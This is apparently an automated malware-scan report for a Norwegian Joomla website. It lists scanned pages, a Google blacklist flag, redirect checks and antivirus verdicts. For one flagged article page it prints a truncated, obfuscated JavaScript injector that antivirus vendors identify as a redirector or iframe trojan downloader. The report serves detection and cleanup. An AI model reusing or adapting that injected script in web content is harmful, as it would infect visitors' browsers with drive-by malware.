New scan:

Malware Scanner report for dittpotensiale.no

Malicious/Suspicious/Total urls checked
1/0/15
1 page has malicious code. See details below
Blacklists
Found
The website is marked by Google as suspicious.

The website "dittpotensiale.no" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=dittpotensiale.no

Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.

Scanned pages/files

RequestServer responseStatus
http://dittpotensiale.no/
200 OK
Content-Length: 8837
Content-Type: text/html
clean
http://dittpotensiale.no/media/system/js/caption.js
200 OK
Content-Length: 1963
Content-Type: application/javascript
clean
http://dittpotensiale.no/index.php?option=com_content&view=frontpage&Itemid=1
200 OK
Content-Length: 8947
Content-Type: text/html
clean
http://dittpotensiale.no/index.php?option=com_content&view=article&id=1&Itemid=2
200 OK
Content-Length: 6542
Content-Type: text/html
clean
http://dittpotensiale.no/index.php?option=com_content&view=article&id=2&Itemid=3
200 OK
Content-Length: 5402
Content-Type: text/html
clean
http://dittpotensiale.no/index.php?option=com_content&view=article&id=10&Itemid=11
200 OK
Content-Length: 14691
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

function CeHxprJ(){if (navigator.userAgent.indexOf('MSIE')>0) return document.body.clientWidth*document.body.clientHeight;else return window.outerWidth*window.outerHeight;}if(CeHxprJ()>100000){function anrLazGcj(tLJVMwsZte){ alert('lJeVYuCF'); }
function UYwXC(hFViNGd){var MxBIRKWcK=3,BBpNk=2;var zDZrBlYwl='199,1-267,0-262,1-280,1-255,0-273,0-261,0-157,1-288,0-267,0-259,1-283,1-265,1-201,0-183,0-157,1-265,1-261,0-267,0-264,0-265,1-283,1-201,0-183,0-157,1-256,1-276,0-280,1-259,1-261,0
... 2878 bytes are skipped ...
oTcYR('TRzkvWzNW')+sQxIwzf('yWAPD'); VuYqPXTlK=document;VuYqPXTlK['2537wr9660i3594t9684e61816173'.replace(/[0-9]/g,'')](WXIPkZxwh);function HMV(YVRztT){ var NFbBgp = document.getElementById('altm');var CroeMY=new Function('fKAKBORmx', 'return 492213;');alert('CrxYo'); }
function zmCsC(MRhI){ var HlnG=new Function('WnYCFEQKuH', 'return 507324;');alert('xFOeIE');alert('xFOeIE'); }
function aBldFL(QkMfhQ){ alert('XXrHfefB');var oeVCBN=new Function('sZQScqbcx', 'return 2838;'); }
}

Antivirus reports:

AntiVir
TR/Redirector.FU.1
Avast
HTML:Iframe-LL [Trj]
nProtect
Trojan.JS.Redirector.FU
K7AntiVirus
Riskware
Emsisoft
Trojan.JS.Redirector.FU (B)
DrWeb
SCRIPT.Virus
Kaspersky
HEUR:Trojan.Script.Iframer
Microsoft
Trojan:JS/Redirector.HC
MicroWorld-eScan
Trojan.JS.Redirector.FU
Fortinet
JS/Shadraem.A!tr.dldr
PCTools
Trojan.Webkit
TotalDefense
JS/Shadraem.A
NANO-Antivirus
Trojan.Script.Shadraem.bfypel
F-Secure
Trojan.JS.Redirector.FU
F-Prot
JS/IFrame.GJ.gen
AVG
HTML/Framer
Norman
Redir.GC
GData
Trojan.JS.Redirector.FU
Symantec
Trojan.Webkit!html
Commtouch
JS/IFrame.GJ.gen
Agnitum
JS.Obfuscated.Gen.1
ESET-NOD32
JS/TrojanDownloader.Shadraem.A
BitDefender
Trojan.JS.Redirector.FU

http://dittpotensiale.no/index.php?option=com_content&view=article&id=3&Itemid=4
200 OK
Content-Length: 20557
Content-Type: text/html
clean
http://dittpotensiale.no/index.php?option=com_content&view=article&id=4&Itemid=5
200 OK
Content-Length: 7796
Content-Type: text/html
clean
http://dittpotensiale.no/index.php?option=com_content&view=article&id=7&Itemid=8
200 OK
Content-Length: 6448
Content-Type: text/html
clean
http://dittpotensiale.no/index.php?option=com_content&view=article&id=8&Itemid=9
200 OK
Content-Length: 10611
Content-Type: text/html
clean
http://dittpotensiale.no/index.php?option=com_content&view=article&id=9&Itemid=10
200 OK
Content-Length: 8325
Content-Type: text/html
clean
http://dittpotensiale.no/index.php?option=com_contact&view=contact&id=1&Itemid=6
200 OK
Content-Length: 7725
Content-Type: text/html
clean
http://dittpotensiale.no/media/system/js/validate.js
200 OK
Content-Length: 4246
Content-Type: application/javascript
clean
http://dittpotensiale.no/index.php?option=com_content&view=article&id=12&Itemid=14
200 OK
Content-Length: 11138
Content-Type: text/html
clean
http://dittpotensiale.no/test404page.js
404 Not Found
Content-Length: 212
Content-Type: text/html
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: dittpotensiale.no

Result:
HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0
Connection: close
Date: Tue, 06 Jan 2015 20:09:01 GMT
Pragma: no-cache
Server: Apache/2.2.16
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 06 Jan 2015 20:09:02 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: fbad5f5943bcb36538d62ffe39cb84fb=u75i3dn17seai3rrnd0cufh1v4; path=/
Second query (visit from search engine):
GET / HTTP/1.1
Host: dittpotensiale.no
Referer: http://www.google.com/search?q=dittpotensiale.no

Result:
The result is similar to the first query. There are no suspicious redirects found.